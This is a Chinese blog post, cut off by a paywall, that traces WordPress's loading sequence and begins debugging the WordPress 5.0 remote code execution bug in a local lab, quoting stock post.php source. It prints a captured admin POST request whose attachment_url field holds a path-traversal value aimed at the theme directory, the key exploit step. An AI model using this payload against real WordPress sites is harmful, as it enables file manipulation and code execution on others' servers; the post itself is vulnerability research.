wordpress5.0分析和漏洞调试初试

最新推荐文章于 2024-05-01 23:38:38 发布

R_1v3r

最新推荐文章于 2024-05-01 23:38:38 发布

阅读量3.4k

点赞数

分类专栏： web攻防

本文链接：https://blog.csdn.net/qq_20307987/article/details/90699713

版权

一、WordPress源码分析

wordpress是单一入口，最初调用的是index.php

define( 'WP_USE_THEMES', true );

/** Loads the WordPress Environment and Template */
require( dirname( __FILE__ ) . '/wp-blog-header.php' );

index.php-> wp-blog->header.php,执行wp()

	require_once( dirname( __FILE__ ) . '/wp-load.php' );

	// Set up the WordPress query.
	wp();

	// Load the theme template.
	require_once( ABSPATH . WPINC . '/template-loader.php' );

—> wp-load.php

—>wp-config.php 配置数据库等

—> wp-setting.php

二、WordPress5.0漏洞调试分析

define('AUTOMATIC_UPDATER_DISABLED',true);

在登陆后台之前在wp-config.php中加入这个，要不然wp会自动更新修复Bug

(1)WordPress 5.0 RCE 详细分析

https://paper.seebug.org/822/

看到在上传图片文件后，修改信息update的时候处理的php文件为/wp-admin/post.php

POST /WordPress/wp-admin/post.php HTTP/1.1
Host: 192.168.1.38
Content-Length: 1024
Cache-Control: max-age=0
Origin: http://192.168.1.38
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: http://192.168.1.38/WordPress/wp-admin/post.php?post=37&action=edit
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: wordpress_e3ca52951c734d0cd487abb89556b35d=admin%7C1559267601%7C3e0fbRXKxUTgAvOqi1C6uyuxv9ml7vKsFOOQMxWY61f%7C209c5042ff858e675c714458adcf73706902372731d51ffd93417748d6348b23; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_e3ca52951c734d0cd487abb89556b35d=admin%7C1559267601%7C3e0fbRXKxUTgAvOqi1C6uyuxv9ml7vKsFOOQMxWY61f%7Cb58cb1615de8a8e460b252db61702533aeb2c331690ebfdf7f0f938aac4d8f19; wp-settings-1=libraryContent%3Dbrowse; wp-settings-time-1=1559094801
Connection: close

_wpnonce=11ee4d6745&_wp_http_referer=%2FWordPress%2Fwp-admin%2Fpost.php%3Fpost%3D37%26action%3Dedit&user_ID=1&action=editpost&originalaction=editpost&post_author=1&post_type=attachment&original_post_status=inherit&referredby=http%3A%2F%2F192.168.1.38%2FWordPress%2Fwp-admin%2Fpost.php%3Fpost%3D37%26action%3Dedit&_wp_original_http_referer=http%3A%2F%2F192.168.1.38%2FWordPress%2Fwp-admin%2Fpost.php%3Fpost%3D37%26action%3Dedit&post_ID=37&meta-box-order-nonce=907417e7f4&closedpostboxesnonce=dcc054a1b3&post_title=1&samplepermalinknonce=baeaaafb2f&excerpt=&_wp_attachment_image_alt=&content=11111111111&attachment_url=http%3A%2F%2F192.168.1.38%2FWordPress%2Fwp-content%2Fuploads%2F2019%2F05%2F1-6.jpg%23%2F..%2F..%2F..%2F..%2Fthemes%2Ftwentynineteen%2F16-e1559100927286.jpg&original_publish=Update&save=Update&advanced_view=1&comment_status=open&add_comment_nonce=5665e358d9&_ajax_fetch_list_nonce=1fd62550b6&_wp_http_referer=%2FWordPress%2Fwp-admin%2Fpost.php%3Fpost%3D37%26action%3Dedit&post_name=1-3&post_author_override=1

wp-admin/post.php

<?php
/**
 * Edit post administration panel.
 *
 * Manage Post actions: post, edit, delete, etc.
 *
 * @package WordPress
 * @subpackage Administration
 */

/** WordPress Administration Bootstrap */
require_once( dirname( __FILE__ ) . '/admin.php' );

$parent_file  = 'edit.php';
$submenu_file = 'edit.php';

wp_reset_vars( array( 'action' ) );

if ( isset( $_GET['post'] ) && isset( $_POST['post_ID'] ) && (int) $_GET['post'] !== (int) $_POST['post_ID'] ) {
   
	wp_die( __( 'A post ID mismatch has been detected.' ), __( 'Sorry, you are not allowed to edit this item.' ), 400 );
} elseif ( isset( $_GET['post'] ) ) {
   
	$post_id = $post_ID = (int) $_GET['post'];
} elseif ( isset( $_POST['post_ID'] ) ) {
   
	$post_id = $post_ID = (int) $_POST['post_ID'];
} else {
   
	$post_id = $post_ID = 0;
}

/**
 * @global string  $post_type
 * @global object  $post_type_object
 * @global WP_Post $post
 */
global $post_type, $post_type_object, $post;

if ( $post_id ) {
   
	$post = get_post( $post_id );
}

if ( $post ) {
   
	$post_type        = $post->post_type;
	$post_type_object = get_post_type_object( $post_type );
}

if ( isset( $_POST['post_type'] ) && $post && $post_type !== $_POST['post_type'] ) {
   
	wp_die( __( 'A post type mismatch has been detected.' ), __( 'Sorry, you are not allowed to edit this item.' ), 400 );
}

if ( isset( $_POST['deletepost'] ) ) {

最低0.47元/天解锁文章

R_1v3r

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
wordpress5.0分析和漏洞调试初试

一、WordPress源码分析wordpress是单一入口，最初调用的是index.phpdefine( 'WP_USE_THEMES', true );/** Loads the WordPress Environment and Template */require( dirname( __FILE__ ) . '/wp-blog-header.php' );index.ph...
复制链接

扫一扫